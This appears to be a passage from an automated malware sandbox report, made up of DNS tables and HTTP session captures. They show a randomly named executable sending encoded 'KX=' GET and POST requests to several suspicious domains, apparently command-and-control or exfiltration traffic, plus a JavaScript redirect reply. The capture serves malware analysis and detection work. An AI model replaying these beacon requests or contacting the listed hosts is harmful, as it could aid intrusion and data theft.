| Dec 14, 2024 13:50:25.303422928 CET | 53 | 59768 | 1.1.1.1 | 192.168.2.8 |
| Dec 14, 2024 13:50:42.023149014 CET | 59847 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 14, 2024 13:50:43.034857988 CET | 59847 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 14, 2024 13:50:43.460613966 CET | 53 | 59847 | 1.1.1.1 | 192.168.2.8 |
| Dec 14, 2024 13:50:43.460628986 CET | 53 | 59847 | 1.1.1.1 | 192.168.2.8 |
| Dec 14, 2024 13:50:58.288575888 CET | 51031 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 14, 2024 13:50:58.782696962 CET | 53 | 51031 | 1.1.1.1 | 192.168.2.8 |
| Dec 14, 2024 13:51:13.335892916 CET | 63283 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 14, 2024 13:51:14.331752062 CET | 63283 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 14, 2024 13:51:14.441052914 CET | 53 | 63283 | 1.1.1.1 | 192.168.2.8 |
| Dec 14, 2024 13:51:14.470036983 CET | 53 | 63283 | 1.1.1.1 | 192.168.2.8 |
| Dec 14, 2024 13:51:28.837759972 CET | 54850 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 14, 2024 13:51:29.150162935 CET | 53 | 54850 | 1.1.1.1 | 192.168.2.8 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 14, 2024 13:50:24.593214035 CET | 192.168.2.8 | 1.1.1.1 | 0x7c87 | Standard query (0) | www.laohub10.net | A (IP address) | IN (0x0001) | false |
| Dec 14, 2024 13:50:42.023149014 CET | 192.168.2.8 | 1.1.1.1 | 0x81ce | Standard query (0) | www.5tuohbpzyj9.buzz | A (IP address) | IN (0x0001) | false |
| Dec 14, 2024 13:50:43.034857988 CET | 192.168.2.8 | 1.1.1.1 | 0x81ce | Standard query (0) | www.5tuohbpzyj9.buzz | A (IP address) | IN (0x0001) | false |
| Dec 14, 2024 13:50:58.288575888 CET | 192.168.2.8 | 1.1.1.1 | 0xa1cb | Standard query (0) | www.canadavinreport.site | A (IP address) | IN (0x0001) | false |
| Dec 14, 2024 13:51:13.335892916 CET | 192.168.2.8 | 1.1.1.1 | 0xf9db | Standard query (0) | www.phoenix88.sbs | A (IP address) | IN (0x0001) | false |
| Dec 14, 2024 13:51:14.331752062 CET | 192.168.2.8 | 1.1.1.1 | 0xf9db | Standard query (0) | www.phoenix88.sbs | A (IP address) | IN (0x0001) | false |
| Dec 14, 2024 13:51:28.837759972 CET | 192.168.2.8 | 1.1.1.1 | 0x55b8 | Standard query (0) | www.ana-silverco.shop | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 14, 2024 13:50:25.303422928 CET | 1.1.1.1 | 192.168.2.8 | 0x7c87 | No error (0) | www.laohub10.net | r0lqcud7.nbnnn.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Dec 14, 2024 13:50:25.303422928 CET | 1.1.1.1 | 192.168.2.8 | 0x7c87 | No error (0) | r0lqcud7.nbnnn.xyz | | 27.124.4.246 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:25.303422928 CET | 1.1.1.1 | 192.168.2.8 | 0x7c87 | No error (0) | r0lqcud7.nbnnn.xyz | | 202.79.161.151 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:25.303422928 CET | 1.1.1.1 | 192.168.2.8 | 0x7c87 | No error (0) | r0lqcud7.nbnnn.xyz | | 23.225.159.42 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:25.303422928 CET | 1.1.1.1 | 192.168.2.8 | 0x7c87 | No error (0) | r0lqcud7.nbnnn.xyz | | 23.225.160.132 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:43.460613966 CET | 1.1.1.1 | 192.168.2.8 | 0x81ce | No error (0) | www.5tuohbpzyj9.buzz | | 156.232.181.155 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:43.460628986 CET | 1.1.1.1 | 192.168.2.8 | 0x81ce | No error (0) | www.5tuohbpzyj9.buzz | | 156.232.181.155 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:58.782696962 CET | 1.1.1.1 | 192.168.2.8 | 0xa1cb | No error (0) | www.canadavinreport.site | | 185.27.134.206 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:51:14.441052914 CET | 1.1.1.1 | 192.168.2.8 | 0xf9db | No error (0) | www.phoenix88.sbs | phoenix88.sbs | | CNAME (Canonical name) | IN (0x0001) | false
Dec 14, 2024 13:51:14.441052914 CET | 1.1.1.1 | 192.168.2.8 | 0xf9db | No error (0) | phoenix88.sbs | | 88.99.61.52 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:51:14.470036983 CET | 1.1.1.1 | 192.168.2.8 | 0xf9db | No error (0) | www.phoenix88.sbs | phoenix88.sbs | | CNAME (Canonical name) | IN (0x0001) | false
Dec 14, 2024 13:51:14.470036983 CET | 1.1.1.1 | 192.168.2.8 | 0xf9db | No error (0) | phoenix88.sbs | | 88.99.61.52 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:51:29.150162935 CET | 1.1.1.1 | 192.168.2.8 | 0x55b8 | No error (0) | www.ana-silverco.shop | | 104.21.90.137 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:51:29.150162935 CET | 1.1.1.1 | 192.168.2.8 | 0x55b8 | No error (0) | www.ana-silverco.shop | | 172.67.156.195 | A (IP address) | IN (0x0001) | false
                                                  • www.laohub10.net
                                                  • www.5tuohbpzyj9.buzz
                                                  • www.canadavinreport.site
                                                  • www.phoenix88.sbs
                                                  • www.ana-silverco.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49715 | 27.124.4.246 | 80 | 2648 | C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:25.442675114 CET | 524 | OUT | GET /8s5b/?KX=CIoU3XkQQhyfpcUgpw2pt4D5rFaewhtqHE31gFJTqo9NSkmYuUT5vLSdoQQ8/MieV/ko0R3BDKl76A9J0JdcYqRwUDZc0hQ5nlduAuRdjiHqVHSyH0yZGbg1OgG3wMBkWQ==&2VqtG=K0rLevU0Wh5tIJEp HTTP/1.1
                                                  Host: www.laohub10.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.5
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Dec 14, 2024 13:50:26.787653923 CET | 525 | IN | HTTP/1.1 200 OK
                                                  Server: Apache
                                                  Content-Type: text/html; charset=utf-8
                                                  Accept-Ranges: bytes
                                                  Cache-Control: max-age=86400
                                                  Age: 1
                                                  Connection: Close
                                                  Content-Length: 350
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                  Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49743 | 156.232.181.155 | 80 | 2648 | C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:43.610299110 CET | 785 | OUT | POST /abgi/ HTTP/1.1
                                                  Host: www.5tuohbpzyj9.buzz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.5tuohbpzyj9.buzz
                                                  Content-Length: 203
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.5tuohbpzyj9.buzz/abgi/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 47 71 45 39 64 77 56 65 7a 49 48 62 35 61 4d 6c 59 75 6d 48 52 4e 77 34 34 75 5a 46 4e 69 32 61 53 58 66 52 6a 35 35 36 6c 2f 4d 46 30 54 31 4a 4a 7a 41 70 32 75 4a 54 48 55 61 59 42 6e 79 51 57 46 4c 66 45 4c 56 59 79 52 42 4f 53 4d 47 51 79 78 4b 6b 4e 2b 4b 61 6f 55 6c 39 48 56 62 71 6d 4e 4a 50 45 31 47 6f 66 59 48 69 33 73 44 73 72 43 50 34 56 6d 65 79 47 42 43 49 64 64 75 50 56 42 5a 38 79 77 61 63 6e 4f 35 59 48 75 72 50 38 4d 67 77 58 74 33 34 37 47 63 67 30 6e 53 2b 63 72 55 59 33 67 35 2b 44 46 75 4b 4b 58 62 6e 31 35 47 38 49 51 4a 48 5a 4b 37 61 62 46 6a 2f 68 43 68 67 71 6d 6f 3d
                                                  Data Ascii: KX=GqE9dwVezIHb5aMlYumHRNw44uZFNi2aSXfRj556l/MF0T1JJzAp2uJTHUaYBnyQWFLfELVYyRBOSMGQyxKkN+KaoUl9HVbqmNJPE1GofYHi3sDsrCP4VmeyGBCIdduPVBZ8ywacnO5YHurP8MgwXt347Gcg0nS+crUY3g5+DFuKKXbn15G8IQJHZK7abFj/hChgqmo=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49749 | 156.232.181.155 | 80 | 2648 | C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:46.267218113 CET | 805 | OUT | POST /abgi/ HTTP/1.1
                                                  Host: www.5tuohbpzyj9.buzz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.5tuohbpzyj9.buzz
                                                  Content-Length: 223
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.5tuohbpzyj9.buzz/abgi/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 47 71 45 39 64 77 56 65 7a 49 48 62 35 36 38 6c 4c 66 6d 48 46 64 77 37 39 75 5a 46 44 43 33 52 53 58 44 52 6a 37 49 39 6c 73 34 46 33 32 5a 4a 4b 79 41 70 6c 65 4a 54 54 45 62 53 4d 48 7a 65 57 46 48 58 45 4a 42 59 79 56 52 4f 53 4e 32 51 79 43 53 6e 50 75 4b 59 75 55 6c 37 49 31 62 71 6d 4e 4a 50 45 78 57 43 66 59 50 69 77 63 54 73 6f 6a 50 6e 59 47 65 74 58 42 43 49 5a 64 75 4c 56 42 5a 65 79 31 79 36 6e 4d 42 59 48 75 37 50 79 34 55 2f 5a 64 33 69 6c 32 63 2b 79 6e 6a 47 62 5a 39 35 70 44 70 76 41 6e 65 4f 43 42 71 4e 76 62 4f 36 4c 51 68 73 5a 4a 54 73 65 79 2b 58 37 68 78 51 30 78 39 45 54 53 43 73 4a 69 46 72 70 63 58 73 42 32 31 4c 62 77 61 74
                                                  Data Ascii: KX=GqE9dwVezIHb568lLfmHFdw79uZFDC3RSXDRj7I9ls4F32ZJKyApleJTTEbSMHzeWFHXEJBYyVROSN2QyCSnPuKYuUl7I1bqmNJPExWCfYPiwcTsojPnYGetXBCIZduLVBZey1y6nMBYHu7Py4U/Zd3il2c+ynjGbZ95pDpvAneOCBqNvbO6LQhsZJTsey+X7hxQ0x9ETSCsJiFrpcXsB21Lbwat


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49755 | 156.232.181.155 | 80 | 2648 | C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:48.922327995 CET | 1822 | OUT | POST /abgi/ HTTP/1.1
                                                  Host: www.5tuohbpzyj9.buzz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.5tuohbpzyj9.buzz
                                                  Content-Length: 1239
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.5tuohbpzyj9.buzz/abgi/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 47 71 45 39 64 77 56 65 7a 49 48 62 35 36 38 6c 4c 66 6d 48 46 64 77 37 39 75 5a 46 44 43 33 52 53 58 44 52 6a 37 49 39 6c 73 67 46 33 45 52 4a 49 52 59 70 30 75 4a 54 51 45 62 54 4d 48 79 43 57 46 76 74 45 4a 4e 6d 79 54 4e 4f 54 76 4f 51 30 7a 53 6e 46 75 4b 59 6a 30 6c 2b 48 56 62 2f 6d 4f 78 44 45 31 79 43 66 59 50 69 77 65 62 73 38 69 50 6e 61 47 65 79 47 42 43 55 64 64 75 7a 56 42 42 6b 79 31 2b 4d 6b 39 68 59 45 50 4c 50 2f 72 38 2f 62 39 33 6b 6b 32 64 74 79 6e 76 5a 62 5a 51 47 70 41 31 46 41 6b 4f 4f 53 32 44 67 31 61 32 5a 56 79 30 62 55 49 48 4a 54 42 4b 4a 38 51 4e 7a 6f 6a 35 4d 59 30 53 30 45 68 5a 4b 72 4d 44 68 51 6a 74 51 62 48 2f 66 55 54 74 64 51 6c 4c 76 6c 75 63 63 6b 75 6f 41 70 62 4a 4e 79 42 31 2f 2f 74 7a 32 45 7a 72 4c 77 78 39 6d 6c 56 6f 52 34 38 76 34 66 51 4b 55 35 46 6d 38 67 66 65 6b 41 4b 4a 52 53 74 5a 48 65 4c 55 6d 46 53 2f 65 6b 72 6a 4a 7a 39 70 48 76 70 39 59 73 58 4b 52 79 39 74 39 36 4a 4e 70 42 4d 34 53 33 33 30 45 39 45 65 61 45 42 55 4e 68 36 79 [TRUNCATED]
                                                  Data Ascii: KX=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 [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49761 | 156.232.181.155 | 80 | 2648 | C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:51.575658083 CET | 528 | OUT | GET /abgi/?KX=LosdeFxQ6b3v/d4SJ/OcJ/MY+PVZKDXZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flNtflpkpcb0CVjulSXUCscL7c5c6O3wfheXeqQy3IVMD/Pg==&2VqtG=K0rLevU0Wh5tIJEp HTTP/1.1
                                                  Host: www.5tuohbpzyj9.buzz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.5
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Dec 14, 2024 13:50:53.265980005 CET | 709 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Sat, 14 Dec 2024 12:50:52 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 566
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49777 | 185.27.134.206 | 80 | 2648 | C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:58.923146009 CET | 797 | OUT | POST /4d2l/ HTTP/1.1
                                                  Host: www.canadavinreport.site
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.canadavinreport.site
                                                  Content-Length: 203
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.canadavinreport.site/4d2l/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 55 45 70 4a 2b 38 42 77 62 64 33 52 52 4e 55 58 69 68 49 4b 6c 6d 77 73 54 70 65 75 49 77 4a 6c 37 39 4d 2f 4e 2b 34 42 42 4b 4c 38 30 4b 48 54 48 63 4d 70 36 6c 50 46 51 51 6c 69 46 72 75 37 70 77 61 32 71 67 4b 77 6b 33 5a 38 5a 54 50 66 39 74 78 4d 59 5a 30 34 32 4f 4c 52 62 55 64 56 74 58 74 59 4b 62 64 51 37 48 7a 38 64 71 6c 4c 75 2b 39 71 39 56 33 6c 75 59 50 6d 65 75 67 4c 69 69 76 32 6f 73 51 59 71 31 4e 41 55 54 30 64 63 37 6c 4c 66 79 61 67 69 75 41 53 6c 4b 46 5a 48 30 53 41 6d 75 61 49 53 53 39 39 38 32 6f 36 36 6d 47 75 33 52 49 38 53 33 74 43 5a 58 55 41 2b 77 77 65 63 4a 51 3d
                                                  Data Ascii: KX=UEpJ+8Bwbd3RRNUXihIKlmwsTpeuIwJl79M/N+4BBKL80KHTHcMp6lPFQQliFru7pwa2qgKwk3Z8ZTPf9txMYZ042OLRbUdVtXtYKbdQ7Hz8dqlLu+9q9V3luYPmeugLiiv2osQYq1NAUT0dc7lLfyagiuASlKFZH0SAmuaISS9982o66mGu3RI8S3tCZXUA+wwecJQ=
Dec 14, 2024 13:51:00.169723034 CET | 683 | IN | HTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Sat, 14 Dec 2024 12:50:59 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                  Cache-Control: no-cache
                                                  Content-Encoding: br
                                                  Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e f4 13 5e 75 0e 4f ff b9 09 74 ed 42 62 10 e4 94 04 a6 39 e9 a1 56 63 80 9f 54 1c cf 30 19 49 bb 08 fb 0b 8c 9a 56 74 63 a1 7c d3 97 b2 9c 60 e4 2c 3c 03 70 ca c2 e7 77 6d f2 90 89 bc 30 24 51 87 06 41 ae 8c 4d 07 0e 4b da d0 84 13 f2 0f 71 df fe 77 91 78 b2 5b 8f 1c e0 5a 31 f0 f9 4d 0d 24 00 b3 46 cb ba 7e 7e 6e 85 d8 5f fa 7b fa 0f 93 39 c0 f5 7c 2e 77 97 3e 7c 65 98 a7 16 30 a6 0e e2 da b5 cc fb b6 d7 ce f7 89 f5 c1 4b 78 63 3e dd f7 25 8e 71 85 31 f1 2f 2e 14 d0 c0 4b f8 b0 cb d9 90 c8 ff 78 7b 12 00 fa 0f ec 38 63 4a 0a 13 0b 99 24 a9 c9 05 2f 35 cf 58 21 8c 62 22 56 39 26 54 c5 bc 16 65 96 e7 3a b5 d6 96 5c 67 42 e4 a5 88 99 48 59 c9 54 2e 5c 19 37 90 7e 9c 67 69 5e 08 53 30 6d 99 66 85 70 dc 29 96 a6 39 17 32 cb ac 76 2d ae cd 44 4f 1b 5d 01 4c 01 fe fd 5d da c5 12 b0 8f 34 24 b0 f3 d7 f7 1f a1 b1 7a be 9b 2e 3d 4d 53 2a a9 22 c4 c7 35 62 e6 87 d0 ee [TRUNCATED]
                                                  Data Ascii: 1b98 #MhEJ^3pNN57KNn^uOtBb9VcT0IVtc|`,<pwm0$QAMKqwx[Z1M$F~~n_{9|.w>|e0Kxc>%q1/.Kx{8cJ$/5X!b"V9&Te:\gBHYT.\7~gi^S0mfp)92v-DO]L]4$z.=MS*"5b( +PUUv;Gjr"v1FIe\{^brh@/teGHSK$jK#R*T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49785 | 185.27.134.206 | 80 | 2648 | C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:51:01.750704050 CET | 817 | OUT | POST /4d2l/ HTTP/1.1
                                                  Host: www.canadavinreport.site
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.canadavinreport.site
                                                  Content-Length: 223
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.canadavinreport.site/4d2l/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 55 45 70 4a 2b 38 42 77 62 64 33 52 52 70 6f 58 74 67 49 4b 74 6d 77 74 50 5a 65 75 52 67 4a 68 37 39 41 2f 4e 2f 4e 47 42 5a 76 38 31 72 33 54 41 59 59 70 7a 31 50 46 49 67 6c 6e 42 72 75 4f 70 77 57 45 71 68 32 77 6b 7a 78 38 5a 52 58 66 2b 65 70 4e 62 70 30 36 75 2b 4c 54 47 45 64 56 74 58 74 59 4b 62 4a 32 37 48 72 38 64 5a 4e 4c 38 71 70 70 78 31 33 6b 74 59 50 6d 56 4f 67 50 69 69 75 62 6f 6f 51 79 71 32 6c 41 55 53 45 64 62 71 6c 4d 52 43 62 4b 6d 75 41 41 6c 61 63 70 50 6b 57 77 6a 63 36 54 61 52 74 32 35 41 5a 51 67 45 4f 6f 30 52 67 58 53 30 46 30 63 67 4a 6f 6b 54 67 75 43 65 45 49 42 6d 42 39 62 6a 53 50 2b 56 2f 57 2f 44 6f 68 38 35 44 79
                                                  Data Ascii: KX=UEpJ+8Bwbd3RRpoXtgIKtmwtPZeuRgJh79A/N/NGBZv81r3TAYYpz1PFIglnBruOpwWEqh2wkzx8ZRXf+epNbp06u+LTGEdVtXtYKbJ27Hr8dZNL8qppx13ktYPmVOgPiiubooQyq2lAUSEdbqlMRCbKmuAAlacpPkWwjc6TaRt25AZQgEOo0RgXS0F0cgJokTguCeEIBmB9bjSP+V/W/Doh85Dy
Dec 14, 2024 13:51:02.982692957 CET | 683 | IN | HTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Sat, 14 Dec 2024 12:51:02 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                  Cache-Control: no-cache
                                                  Content-Encoding: br
                                                  Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e f4 13 5e 75 0e 4f ff b9 09 74 ed 42 62 10 e4 94 04 a6 39 e9 a1 56 63 80 9f 54 1c cf 30 19 49 bb 08 fb 0b 8c 9a 56 74 63 a1 7c d3 97 b2 9c 60 e4 2c 3c 03 70 ca c2 e7 77 6d f2 90 89 bc 30 24 51 87 06 41 ae 8c 4d 07 0e 4b da d0 84 13 f2 0f 71 df fe 77 91 78 b2 5b 8f 1c e0 5a 31 f0 f9 4d 0d 24 00 b3 46 cb ba 7e 7e 6e 85 d8 5f fa 7b fa 0f 93 39 c0 f5 7c 2e 77 97 3e 7c 65 98 a7 16 30 a6 0e e2 da b5 cc fb b6 d7 ce f7 89 f5 c1 4b 78 63 3e dd f7 25 8e 71 85 31 f1 2f 2e 14 d0 c0 4b f8 b0 cb d9 90 c8 ff 78 7b 12 00 fa 0f ec 38 63 4a 0a 13 0b 99 24 a9 c9 05 2f 35 cf 58 21 8c 62 22 56 39 26 54 c5 bc 16 65 96 e7 3a b5 d6 96 5c 67 42 e4 a5 88 99 48 59 c9 54 2e 5c 19 37 90 7e 9c 67 69 5e 08 53 30 6d 99 66 85 70 dc 29 96 a6 39 17 32 cb ac 76 2d ae cd 44 4f 1b 5d 01 4c 01 fe fd 5d da c5 12 b0 8f 34 24 b0 f3 d7 f7 1f a1 b1 7a be 9b 2e 3d 4d 53 2a a9 22 c4 c7 35 62 e6 